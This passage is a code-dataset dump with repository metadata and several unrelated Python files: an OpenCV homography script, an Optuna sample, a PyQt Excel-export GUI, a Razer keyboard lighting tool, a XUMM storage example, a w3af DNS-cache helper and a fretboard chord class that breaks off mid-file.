hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
804b9dcfe64b7676e4cb3e82339b0395f8d54822 | 2,309 | py | Python | homography-transformation-points.py | Tomikrys/RePhoto | ae0710c68efd91edff5a54f159d8452ea43f5a19 | [
"BSD-3-Clause"
] | null | null | null | homography-transformation-points.py | Tomikrys/RePhoto | ae0710c68efd91edff5a54f159d8452ea43f5a19 | [
"BSD-3-Clause"
] | null | null | null | homography-transformation-points.py | Tomikrys/RePhoto | ae0710c68efd91edff5a54f159d8452ea43f5a19 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import cv2
import sys
import json
import os
if (len(sys.argv) != 5):
print('2 arguments required')
exit()
img1 = cv2.imread(sys.argv[1])
img2 = cv2.imread(sys.argv[2])
file = open(sys.argv[4], "r")
points = json.loads(file.read())
dst_pts = np.float32(points['old']).reshape(-1,1,2)
src_pts = np.float32(points['new']).reshape(-1,1,2)
print (src_pts)
print (dst_pts)
h1, w1, c = img1.shape
h2, w2, c = img2.shape
out_img_h = h1
out_img_w = w1
# scale the dst_point to resolution of the image we will be warping
if (h1 < h2 and w1 < w2):
for i in range(len(dst_pts)):
print(dst_pts[i][0])
print((float(w2)/w1))
dst_pts[i][0][0] = dst_pts[i][0][0] * (float(w2)/w1)
dst_pts[i][0][1] = dst_pts[i][0][1] * (float(h2)/h1)
print(dst_pts[i][0])
out_img_h = h2
out_img_w = w2
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
print(M)
# if (h1 < h2 and w1 < w2):
# if (False):
# M = np.multiply(M, [ [(float(w2)/w1), 1, 1], [1, (float(h2)/h1), 1], [1, 1, 1,] ])
# print(M)
# print(w2, w1)
# print((float(w2)/float(w1)))
# im_out = cv2.warpPerspective(img2, M, (img2.shape[1],img2.shape[0]))
# if not os.path.exists(os.path.dirname(sys.argv[3])):
# os.mkdir(os.path.dirname(sys.argv[3]))
# cv2.imwrite(sys.argv[3], im_out)
# print('true')
# else:
im_out = cv2.warpPerspective(img2, M, (out_img_w,out_img_h))
if not os.path.exists(os.path.dirname(sys.argv[3])):
os.mkdir(os.path.dirname(sys.argv[3]))
cv2.imwrite(sys.argv[3], im_out)
print('true')
# matchesMask = mask.ravel().tolist()
# sift = cv2.SIFT()
# kp1, des1 = sift.detectAndCompute(img1,None)
# kp2, des2 = sift.detectAndCompute(img2,None)
# h = img1.shape[0]
# w = img1.shape[1]
# pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
# dst = cv2.perspectiveTransform(pts,M)
# img2 = cv2.polylines(img2,[np.int32(dst)],True,255,3, cv2.LINE_AA)
# draw_params = dict(matchColor = (0,255,0), # draw matches in green color
# singlePointColor = None,
# matchesMask = matchesMask, # draw only inliers
# flags = 2)
# img3 = cv2.drawMatches(img1,kp1,img2,kp2,good,None,**draw_params)
# cv2.imwrite(sys.argv[3].jpg, img3) | 27.819277 | 88 | 0.607189 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,232 | 0.533564 |
804b9f804c6f3973c7e0b57683f0dc138f768005 | 1,634 | py | Python | cpp/opt.py | AtsushiSakai/optuna_sample | 06282ea35e8fcd2a4b0ffafb8080f56ffbf3ff66 | [
"MIT"
] | 1 | 2019-02-06T09:43:04.000Z | 2019-02-06T09:43:04.000Z | cpp/opt.py | AtsushiSakai/optuna_sample | 06282ea35e8fcd2a4b0ffafb8080f56ffbf3ff66 | [
"MIT"
] | null | null | null | cpp/opt.py | AtsushiSakai/optuna_sample | 06282ea35e8fcd2a4b0ffafb8080f56ffbf3ff66 | [
"MIT"
] | null | null | null | """
Parameter optimization with optuna for Cpp code
author: Atsushi Sakai
"""
import optuna
import numpy as np
import matplotlib.pyplot as plt
import subprocess
def HimmelblauFunction(x, y):
"""
Himmelblau's function
see Himmelblau's function - Wikipedia, the free encyclopedia
http://en.wikipedia.org/wiki/Himmelblau%27s_function
"""
return (x**2 + y - 11)**2 + (x + y**2 - 7)**2
def objective(trial):
x = trial.suggest_uniform('x', -5, 5)
y = trial.suggest_uniform('y', -5, 5)
cmd = "./a.out " + str(x) + " " + str(y)
d = subprocess.check_output(cmd.split())
return float(d)
def CreateMeshData():
minXY = -5.0
maxXY = 5.0
delta = 0.1
x = np.arange(minXY, maxXY, delta)
y = np.arange(minXY, maxXY, delta)
X, Y = np.meshgrid(x, y)
Z = [HimmelblauFunction(x, y) for (x, y) in zip(X, Y)]
return(X, Y, Z)
def main():
print("start!!")
# plot Himmelblau Function
(X, Y, Z) = CreateMeshData()
CS = plt.contour(X, Y, Z, 50)
# optimize
study = optuna.create_study(
study_name="julia_himmelblau_function_opt",
# storage="mysql://root@localhost/optuna"
)
# study = optuna.Study(
# study_name="himmelblau_function_opt3",
# storage="mysql://root@localhost/optuna"
# )
# study.optimize(objective, n_jobs=1)
study.optimize(objective, n_trials=100, n_jobs=1)
print(len(study.trials))
print(study.best_params)
# plot optimize result
plt.plot(study.best_params["x"], study.best_params["y"], "xr")
plt.show()
print("done!!")
if __name__ == '__main__':
main()
| 21.786667 | 66 | 0.618115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 569 | 0.348225 |
804bc1d2b19b9534b855e8e39ec3bfa6a9bb4dd1 | 5,385 | py | Python | gui/select_excel.py | Tac213/ECConverter | d66d35f7e4ac2802f83ab4e595764c7f8004d317 | [
"MIT"
] | 1 | 2021-08-17T04:46:16.000Z | 2021-08-17T04:46:16.000Z | gui/select_excel.py | Tac213/ECConverter | d66d35f7e4ac2802f83ab4e595764c7f8004d317 | [
"MIT"
] | null | null | null | gui/select_excel.py | Tac213/ECConverter | d66d35f7e4ac2802f83ab4e595764c7f8004d317 | [
"MIT"
] | 1 | 2021-08-17T04:46:18.000Z | 2021-08-17T04:46:18.000Z | # -*- coding: utf-8 -*-
# author: Tac
# contact: gzzhanghuaxiong@corp.netease.com
import os.path
from PyQt6.QtWidgets import QFrame, QVBoxLayout, QPushButton, QSizePolicy, QFileDialog, QMessageBox
from PyQt6.QtCore import Qt, QDir, QModelIndex
from gui.excel_list_view import ExcelListView
from gui.model.excel_list_model import ExcelListModel
import settings
import ec_converter
class SelectExcel(QFrame):
"""
选择需要导出Excel的窗口
"""
def __init__(self, parent=None):
"""
构造器
Args:
parent: 父Widget
"""
super(SelectExcel, self).__init__(parent)
self.excel_list_view = ExcelListView(self)
model = ExcelListModel()
self.excel_list_view.setModel(model)
self.select_excel_button = QPushButton(self.tr('选择Excel'), self)
self.select_excel_button.setToolTip(self.tr('选择本次需要导表的Excel文件,加到Excel列表中'))
self.select_excel_button.clicked.connect(self._on_select_excel)
self.convert_button = QPushButton(self.tr('导表'), self)
self.convert_button.setToolTip(self.tr('对Excel列表中的所有Excel文件执行导表程序'))
self.convert_button.clicked.connect(self._on_convert)
self.gen_info_button = QPushButton(self.tr('生成项目Excel信息'), self)
self.gen_info_button.setToolTip(self.tr('生成%s和%s') % (os.path.basename(settings.EXCEL_INFO_FILENAME),
os.path.basename(settings.REF_FILENAME)))
self.gen_info_button.clicked.connect(self._on_gen_info)
self._excel_dir = QDir(settings.EXCEL_DIR)
self._init_layout()
def _init_layout(self):
"""
初始化layout
Returns:
None
"""
layout = QVBoxLayout()
layout.addWidget(self.excel_list_view)
layout.addWidget(self.select_excel_button)
layout.addWidget(self.convert_button)
layout.addWidget(self.gen_info_button)
layout.setContentsMargins(10, 10, 10, 10)
layout.setSpacing(10)
layout.setAlignment(Qt.AlignmentFlag.AlignTop)
self.setLayout(layout)
self.setSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Fixed)
def set_excel_data(self, data):
"""
设置要导出Excel的数据
Args:
data: [list]数据,每一项是Excel的相对路径
Returns:
None
"""
self.excel_list_view.model().deserialize(data)
def _on_select_excel(self):
"""
点击“选择Excel”按钮回调
Returns:
None
"""
# _是fileter,这里没有用
files, _ = QFileDialog.getOpenFileNames(
self,
self.tr('选择需要导表的Excel'),
self._excel_dir.path(),
'*.xlsx',
)
current_files = self.excel_list_view.model().serialize()
for file_path in files:
file_path = self._excel_dir.relativeFilePath(file_path)
if file_path in current_files:
continue
if file_path.startswith('..'):
ec_converter.logger.warning(self.tr('所选Excel文件必须要在\'%s\'目录内'), self._excel_dir.path())
continue
if '/' in file_path:
ec_converter.logger.warning(self.tr('所选Excel文件不能在\'%s\'目录的子目录内'), self._excel_dir.path())
continue
self.excel_list_view.model().add_node(QModelIndex(), file_path)
def _on_convert(self):
"""
点击导表按钮回调
Returns:
None
"""
import convert
current_files = self.excel_list_view.model().serialize()
files_full_path = []
for file in current_files:
full_path = self._excel_dir.absoluteFilePath(file)
files_full_path.append(full_path)
if files_full_path:
try:
success = convert.convert_data(files_full_path)
if success:
QMessageBox.information(self, self.tr('提示'), self.tr('导表成功'),
QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
else:
QMessageBox.critical(self, self.tr('错误'), self.tr('导表失败,失败原因请参照输出窗口'),
QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
except Exception:
stack_str = ec_converter.logger.log_last_except()
QMessageBox.critical(self, self.tr('导表失败'), stack_str,
QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
def _on_gen_info(self):
"""
生成表格信息回调
Returns:
None
"""
import convert
try:
success = convert.generate_excel_info()
if success:
QMessageBox.information(self, self.tr('提示'), self.tr('生成成功'),
QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
else:
QMessageBox.critical(self, self.tr('错误'), self.tr('生成失败,失败原因请参照输出窗口'),
QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
except Exception:
stack_str = ec_converter.logger.log_last_except()
QMessageBox.critical(self, self.tr('生成失败'), stack_str,
QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
| 37.922535 | 109 | 0.594429 | 5,403 | 0.933322 | 0 | 0 | 0 | 0 | 0 | 0 | 1,245 | 0.215063 |
804caf63ac2093aca40cc342a98958d4f3398ae7 | 16,359 | py | Python | i3razer/i3_razer.py | leofah/i3razer | 526db521d99e371b643d6e1a05a29788c239a95a | [
"MIT"
] | 5 | 2020-07-30T20:59:37.000Z | 2021-11-13T02:17:12.000Z | i3razer/i3_razer.py | leofah/i3razer | 526db521d99e371b643d6e1a05a29788c239a95a | [
"MIT"
] | 1 | 2022-03-31T21:38:08.000Z | 2022-03-31T22:37:38.000Z | i3razer/i3_razer.py | leofah/i3razer | 526db521d99e371b643d6e1a05a29788c239a95a | [
"MIT"
] | null | null | null | from logging import getLogger
from openrazer.client import DeviceManager, constants as razer_constants
from i3razer import config_contants as conf
from i3razer.config_parser import ConfigParser
from i3razer.layout import layouts
from i3razer.pyxhook import HookManager
ERR_DAEMON_OFF = -2 # openrazer is not running
ERR_NO_KEYBOARD = -3 # no razer keyboard found
ERR_CONFIG = -4 # Error in config file
class I3Razer:
_logger = None
# Keyboard settings
_serial = ""
_keyboard = None
_key_layout = {}
_key_layout_name = "" # Only present if layout is set manually
# handle modes and keys
_listen_to_keys = set() # the keys which could change the displayed color scheme
_current_pressed_keys = set()
_current_scheme_name = ""
_mode = None
_config = None
_drawing_scheme = set() # prevent infinite inherit loop in color schemes
# Thread handling
_hook = None
_running = False
def __init__(self, config_file, layout=None, logger=None):
"""
config_file: path to the config file
layout: keyboard Layout to use for lighting the keys. If none is given it is detected automatically
logger: Logger to use for logging
"""
if not logger:
logger = getLogger(__name__)
self._logger = logger
self._load_config(config_file)
self._load_keyboard(layout)
def _update_color_scheme(self):
"""
Determines which color scheme should be displayed and displays it
"""
if self._running:
if not self._mode:
self._mode = self._config.get_mode_by_name(conf.mode_default)
self._listen_to_keys = self._config.get_important_keys_mode(self._mode)
self._logger.debug(f"pressed keys: {self._current_pressed_keys} in mode {self._mode[conf.field_name]}")
# find mode
next_mode = self._config.get_next_mode(self._current_pressed_keys, self._mode)
if next_mode[conf.field_name] != self._mode[conf.field_name]:
# swapped to a new mode
self._mode = next_mode
self._listen_to_keys = self._config.get_important_keys_mode(self._mode)
# update color scheme for mode
scheme = self._config.get_color_scheme(self._current_pressed_keys, self._mode)
self._draw_color_scheme(scheme)
def _draw_color_scheme(self, color_config):
"""
draw the given color scheme
"""
if self._current_scheme_name == color_config[conf.field_name]:
return
# parse type
if conf.field_type in color_config:
if color_config[conf.field_type] == conf.type_static:
self._draw_static_scheme(color_config)
else:
self._draw_color_effect(color_config)
else:
self._draw_static_scheme(color_config)
self._current_scheme_name = color_config[conf.field_name]
self._logger.info(f"Drawn color scheme '{color_config[conf.field_name]}'")
def _draw_color_effect(self, color_config):
"""
Draw an effect color scheme
"""
if conf.field_type not in color_config:
return
effect_type = color_config[conf.field_type]
fx = self._keyboard.fx
# find colors for effect
color1, color2, color3 = None, None, None
nr_colors = 0
if conf.type_color in color_config:
color1 = self._config.get_color(color_config[conf.type_color])
nr_colors = 1
elif conf.type_color1 in color_config:
color1 = self._config.get_color(color_config[conf.type_color1])
nr_colors = 1
if conf.type_color2 in color_config:
color2 = self._config.get_color(color_config[conf.type_color2])
nr_colors = 2
if conf.type_color3 in color_config:
color3 = self._config.get_color(color_config[conf.type_color3])
nr_colors = 3
# huge switch through all modes -----------------------------------------------------------------
# breath
if effect_type == conf.type_breath:
if nr_colors >= 3 and fx.has("breath_triple"):
fx.breath_triple(color1[0], color1[1], color1[2], color2[0], color2[1], color2[2], color3[0], color3[1],
color3[2])
elif nr_colors >= 2 and fx.has("breath_dual"):
fx.breath_dual(color1[0], color1[1], color1[2], color2[0], color2[1], color2[2])
elif nr_colors >= 1 and fx.has("breath_single"):
fx.breath_single(color1[0], color1[1], color1[2])
elif nr_colors >= 0:
fx.breath_random()
# reactive
elif effect_type == conf.type_reactive:
if not fx.has("reactive"):
self._logger.warning(f"reactive not supported by keyboard {self._keyboard.name}")
return
if not color1:
self._logger.warning(f"No color for reactive set in {color_config[conf.field_name]}")
return
time = conf.time_r_default
if conf.type_option_time in color_config:
time = color_config[conf.type_option_time]
razer_time = razer_constants.REACTIVE_500MS if time == conf.time_500 \
else razer_constants.REACTIVE_1000MS if time == conf.time_1000 \
else razer_constants.REACTIVE_1500MS if time == conf.time_1500 \
else razer_constants.REACTIVE_2000MS if time == conf.time_2000 \
else None
fx.reactive(color1[0], color1[1], color1[2], razer_time)
# ripple
elif effect_type == conf.type_ripple:
if not fx.has("ripple"):
self._logger.warning(f"ripple not supported by keyboard {self._keyboard.name}")
return
if color1:
fx.ripple(color1[0], color1[1], color1[2], razer_constants.RIPPLE_REFRESH_RATE)
else:
fx.ripple_random(razer_constants.RIPPLE_REFRESH_RATE)
# spectrum
elif effect_type == conf.type_spectrum:
if not fx.has("spectrum"):
self._logger.warning(f"spectrum not supported by keyboard {self._keyboard.name}")
return
fx.spectrum()
# starlight
elif effect_type == conf.type_starlight:
time = conf.time_s_default
if conf.type_option_time in color_config:
time = color_config[conf.type_option_time]
razer_time = razer_constants.STARLIGHT_FAST if time == conf.time_fast \
else razer_constants.STARLIGHT_NORMAL if time == conf.time_normal \
else razer_constants.STARLIGHT_SLOW if time == conf.time_slow \
else None
if nr_colors >= 2 and fx.has("starlight_dual"):
fx.starlight_dual(color1[0], color1[1], color1[2], color2[0], color2[1], color2[2], razer_time)
elif nr_colors >= 1 and fx.has("starlight_single"):
fx.starlight_single(color1[0], color1[1], color1[2], razer_time)
elif nr_colors >= 0:
fx.starlight_random(razer_time)
# wave right
elif effect_type == conf.type_wave_right:
fx.wave(razer_constants.WAVE_RIGHT)
# wave left
elif effect_type == conf.type_wave_left:
fx.wave(razer_constants.WAVE_LEFT)
else:
self._logger.warning(f"type '{effect_type}' is not known")
# switch finished
def _draw_static_scheme(self, color_config):
"""
draw a static color scheme
"""
# One could save the result matrix to be faster on a following draw
self._keyboard.fx.advanced.matrix.reset()
self._add_to_static_scheme(color_config)
self._keyboard.fx.advanced.draw()
def _add_to_static_scheme(self, color_config):
"""
Adds inherited color schemes on display matrix
"""
# assert scheme type is static
if color_config[conf.field_type] != conf.type_static:
self._logger.warning(f"trying to inherit a non static color scheme '{color_config[conf.field_name]}")
return
# handle infinite loop
name = color_config[conf.field_name]
if name in self._drawing_scheme:
# should be detected on reading config
self._logger.warning(f"color scheme '{name}' is in an inherit loop with {self._drawing_scheme}")
return
self._drawing_scheme.add(name)
# set colors
for field in color_config:
# handle "inherit
if field == conf.field_inherit:
add_scheme = self._config.get_color_scheme_by_name(color_config[conf.field_inherit])
self._add_to_static_scheme(add_scheme)
continue
# non color fields
if field in conf.no_color_in_scheme:
continue
# handle "all"
if field == conf.all_keys:
keys = self._key_layout.keys()
else:
# field is a key array
keys = self._config.get_keys(field)
if keys:
color = self._config.get_color(color_config[field])
self._set_color(color, keys)
self._drawing_scheme.remove(name)
def _set_color(self, color, keys):
for key in keys:
if key in self._key_layout:
self._keyboard.fx.advanced.matrix[self._key_layout[key]] = color
else:
self._logger.warning(f"Key '{key}' not found in Layout")
def _load_keyboard(self, layout):
"""
Load Keyboard on startup
"""
self._key_layout_name = layout
if not self.reload_keyboard():
self._logger.critical("No Razer Keyboard found")
exit(ERR_NO_KEYBOARD)
def _setup_key_hook(self):
"""
Setup pyxhook to recognize key presses
"""
def on_key_pressed(event):
# Key pressed, update scheme if needed
key = event.Key.lower() # config is in lower case
if key not in self._current_pressed_keys:
self._current_pressed_keys.add(key)
if key in self._listen_to_keys:
self._update_color_scheme()
def on_key_released(event):
key = event.Key.lower()
if key in self._current_pressed_keys:
self._current_pressed_keys.remove(key)
else:
self._logger.warning(
f"releasing key {key} not in pressed keys {self._current_pressed_keys}, resetting pressed keys")
self._current_pressed_keys = set()
if key in self._listen_to_keys:
self._update_color_scheme()
# init hook manager
hook = HookManager()
hook.KeyDown = on_key_pressed
hook.KeyUp = on_key_released
self._hook = hook
def _load_config(self, config_file):
"""
Load config on startup
"""
self._config = ConfigParser(config_file, self._logger)
if not self._config.is_integral():
self._logger.critical("Error while loading config file")
exit(ERR_CONFIG)
###############################################
# public methods to change or query the state #
###############################################
def start(self):
"""
Start the shortcut visualisation. This starts a new Thread.
Stop this by calling stop() on the object.
"""
if not self._running:
self._logger.warning("Starting Hook")
self._setup_key_hook()
self._hook.start()
self._running = True
self._update_color_scheme()
def stop(self):
"""
stops the program by stopping the internal thread waiting for keyboard events
"""
if self._running:
self._logger.warning(f"Stopping hook")
self._running = False
self._hook.cancel()
self._hook = None
def reload_config(self, config_file=None) -> bool:
"""
Loads a new config file and updates color_scheme accordingly
return: False if error in config
"""
if not self._config.read(config_file):
self._logger.error(f"Error in config, using old config file")
return False
self.force_update_color_scheme()
return True
def reload_keyboard(self, layout=None) -> bool:
"""
Reloads to the computer connected keyboards, and could set an layout
return: true if a razer keyboard was loaded
"""
device_manager = DeviceManager()
for device in device_manager.devices:
if device.type == "keyboard":
self._keyboard = device
break
if self._keyboard:
if layout:
self._key_layout_name = layout
device_manager.sync_effects = False
self._serial = str(self._keyboard.serial)
self.load_layout(self._key_layout_name)
else:
self._logger.error("no razer keyboard found")
return False
self._logger.info(f"successfully loaded Keyboard {self._keyboard.name}")
return True
def load_layout(self, layout_name=None) -> bool:
"""
Loads the named layout for the current keyboard. If none is named, the layout is detected automatically
returns False if the layout cannot be found, the layout is not changed
"""
# Keysyms have a new map if layout changed
if self._hook:
self._hook.reset_keysyms()
no_layout = False # flow control
if not layout_name:
no_layout = True
if self._keyboard:
layout_name = self._keyboard.keyboard_layout
self._logger.info(f"Detected Layout {layout_name}")
if layout_name not in layouts and no_layout:
self._logger.error(f"Layout {layout_name} not found, using default 'en_US'")
layout_name = "en_US" # en_US is default and in layout.py
if layout_name in layouts:
# Load the layout
self._key_layout = layouts[layout_name]
self._logger.info(f"Loaded keyboard layout {layout_name}")
return True
def change_mode(self, mode_name: str) -> bool:
"""
changes the current mode to the given one and updates the scheme
return: False if mode does not exist in config
"""
new_mode = _mode = self._config.get_mode_by_name(mode_name)
if new_mode:
self._mode = new_mode
self._listen_to_keys = self._config.get_important_keys_mode(self._mode)
self._update_color_scheme()
return True
return False
def get_mode_name(self) -> str:
"""
returns the name of the current mode
"""
if self._mode:
return self._mode[conf.field_name]
else:
# if no mode loaded, return default name
return conf.mode_default
def change_color_scheme(self, color_scheme_name: str) -> bool:
"""
changes the displayed color scheme. On the next keypress, the old associated color scheme is shown again.
Works also if the thread is not started yet, then the scheme does not change on a keypress
return: false if the color scheme cannot be found
"""
color_config = self._config.get_color_scheme_by_name(color_scheme_name)
if not color_config:
return False
self._draw_color_scheme(color_config)
return True
def get_color_scheme_name(self) -> str:
"""
returns the current drawn color scheme
"""
return self._current_scheme_name
def force_update_color_scheme(self):
"""
deletes internal variables and detects which color scheme to show
"""
self._current_scheme_name = ""
self._update_color_scheme()
| 38.311475 | 120 | 0.599609 | 15,948 | 0.974876 | 0 | 0 | 0 | 0 | 0 | 0 | 4,357 | 0.266337 |
804d7d8b57791079c4cce17fe9505b784c3b6b5e | 1,471 | py | Python | samples/storage.py | xdvlabs/xumm-sdk-py | c92066a6e9738e402e0ae1627dd21fbc6b3bead1 | [
"MIT"
] | 4 | 2022-01-29T11:22:06.000Z | 2022-03-01T03:36:59.000Z | samples/storage.py | CASL-AE/xumm-py | dbe040f409ffc5f918086a12f190ef289e709d22 | [
"MIT"
] | 4 | 2022-01-14T22:49:02.000Z | 2022-01-18T17:32:21.000Z | samples/storage.py | CASL-AE/xumm-py | dbe040f409ffc5f918086a12f190ef289e709d22 | [
"MIT"
] | 2 | 2022-03-01T03:32:35.000Z | 2022-03-20T17:11:56.000Z | #!/usr/bin/env python
# coding: utf-8
import logging
import asyncio
import xumm
class StorageExample:
def __init__(self):
logging.debug('')
self.sdk = xumm.XummSdk('API_KEY', 'API_SECRET')
self.logger = logging.getLogger(self.__module__)
self.logger.setLevel(level=logging.DEBUG)
async def run(self):
# storge some json value in storage
self.logger.info("Set storage value")
set_storage_result = self.sdk.storage.set({'name': 'Wietse', 'age': 32, 'male': True})
# True
if not set_storage_result:
self.logger.error("Unable to set to storage: %s" % e)
return
# GET the storage content
get_storage_result = self.sdk.storage.get()
self.logger.info("Current storage value: %s" % get_storage_result.data)
# { 'name': 'Wietse', 'age': 32, 'male': True }
self.logger.info("Delete storage value")
delete_storage_result = self.sdk.storage.delete()
if not delete_storage_result:
self.logger.error("Unable to delete the storage: %s" % delete_storage_result)
get_storage_result_after_delete = self.sdk.storage.get()
self.logger.info("Current storage value after delete: %s" % get_storage_result_after_delete.data)
# None
if __name__ == "__main__":
example = StorageExample()
loop = asyncio.get_event_loop()
loop.run_until_complete(example.run())
| 29.42 | 105 | 0.638341 | 1,230 | 0.836166 | 0 | 0 | 0 | 0 | 989 | 0.672332 | 385 | 0.261727 |
804e64952849f44f6670f2c038c06ff8ef3ff239 | 2,318 | py | Python | packages/w3af/w3af/core/controllers/misc/dns_cache.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | 3 | 2019-04-09T22:59:33.000Z | 2019-06-14T09:23:24.000Z | tools/w3af/w3af/core/controllers/misc/dns_cache.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | tools/w3af/w3af/core/controllers/misc/dns_cache.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | """
dns_cache.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import socket
# pylint: disable=E0401
from darts.lib.utils.lru import SynchronizedLRUDict
# pylint: enable=E0401
import w3af.core.controllers.output_manager as om
def enable_dns_cache():
"""
DNS cache trick
This will speed up all the test! Before this dns cache voodoo magic every
request to the HTTP server required a DNS query, this is slow on some
networks so I added this feature.
This method was taken from:
# $Id: download.py,v 1.30 2004/05/13 09:55:30 torh Exp $
That is part of :
swup-0.0.20040519/
Developed by:
# Copyright 2001 - 2003 Trustix AS - <http://www.trustix.com>
# Copyright 2003 - 2004 Tor Hveem - <tor@bash.no>
# Copyright 2004 Omar Kilani for tinysofa - <http://www.tinysofa.org>
"""
om.out.debug('Enabling _dns_cache()')
if not hasattr(socket, 'already_configured'):
socket._getaddrinfo = socket.getaddrinfo
_dns_cache = SynchronizedLRUDict(200)
def _caching_getaddrinfo(*args, **kwargs):
query = (args)
try:
res = _dns_cache[query]
#This was too noisy and not so useful
#om.out.debug('Cached DNS response for domain: ' + query[0] )
return res
except KeyError:
res = socket._getaddrinfo(*args, **kwargs)
_dns_cache[args] = res
msg = 'DNS response from DNS server for domain: %s'
om.out.debug(msg % query[0])
return res
if not hasattr(socket, 'already_configured'):
socket.getaddrinfo = _caching_getaddrinfo
socket.already_configured = True
| 31.324324 | 77 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,534 | 0.661777 |
80524ca8ae4e4f10430fd0ea3cbd3e1253bc5c64 | 3,875 | py | Python | fretboard/chord.py | honorabel/python-fretboard | fb6a37e29bf6a19bee11940e9b42d58220c1306c | [
"MIT"
] | 69 | 2016-11-18T02:11:01.000Z | 2022-03-26T12:54:55.000Z | fretboard/chord.py | honorabel/python-fretboard | fb6a37e29bf6a19bee11940e9b42d58220c1306c | [
"MIT"
] | 3 | 2018-05-24T15:08:46.000Z | 2020-09-19T21:49:36.000Z | fretboard/chord.py | honorabel/python-fretboard | fb6a37e29bf6a19bee11940e9b42d58220c1306c | [
"MIT"
] | 16 | 2018-06-12T10:34:26.000Z | 2021-01-09T15:21:55.000Z | import copy
import attrdict
import svgwrite
import yaml
from .compat import StringIO
from .fretboard import Fretboard
from .utils import dict_merge
CHORD_STYLE = '''
string:
muted_font_color: silver
open_font_color: steelblue
'''
class Chord(object):
default_style = dict_merge(
yaml.safe_load(CHORD_STYLE),
Fretboard.default_style
)
inlays = Fretboard.inlays
strings = 6
def __init__(self, positions=None, fingers=None, style=None):
if positions is None:
positions = []
elif '-' in positions:
positions = positions.split('-')
else:
positions = list(positions)
self.positions = list(map(lambda p: int(p) if p.isdigit() else None, positions))
self.fingers = list(fingers) if fingers else []
self.style = attrdict.AttrDict(
dict_merge(
copy.deepcopy(self.default_style),
style or {}
)
)
def get_barre_fret(self):
for index, finger in enumerate(self.fingers):
if finger.isdigit() and self.fingers.count(finger) > 1:
return int(self.positions[index])
def get_fret_range(self):
fretted_positions = list(filter(lambda pos: isinstance(pos, int), self.positions))
if max(fretted_positions) < 5:
first_fret = 0
else:
first_fret = min(filter(lambda pos: pos != 0, fretted_positions))
return (first_fret, first_fret + 4)
def draw(self):
self.fretboard = Fretboard(
strings=self.strings,
frets=self.get_fret_range(),
inlays=self.inlays,
style=self.style
)
# Check for a barred fret (we'll need to know this later)
barre_fret = None
for index, finger in enumerate(self.fingers):
if finger.isdigit() and self.fingers.count(finger) > 1:
barre_fret = self.positions[index]
barre_start = index
barre_end = len(self.fingers) - self.fingers[::-1].index(finger) - 1
break
if barre_fret is not None:
self.fretboard.add_marker(
string=(barre_start, barre_end),
fret=barre_fret,
label=finger,
)
for string in range(self.strings):
# Get the position and fingering
try:
fret = self.positions[string]
except IndexError:
pos = None
# Determine if the string is muted or open
is_muted = False
is_open = False
if fret == 0:
is_open = True
elif fret is None:
is_muted = True
if is_muted or is_open:
self.fretboard.add_string_label(
string=string,
label='X' if is_muted else 'O',
font_color=self.style.string.muted_font_color if is_muted else self.style.string.open_font_color
)
elif fret is not None and fret != barre_fret:
# Add the fret marker
try:
finger = self.fingers[string]
except IndexError:
finger = None
self.fretboard.add_marker(
string=string,
fret=fret,
label=finger,
)
def render(self, output=None):
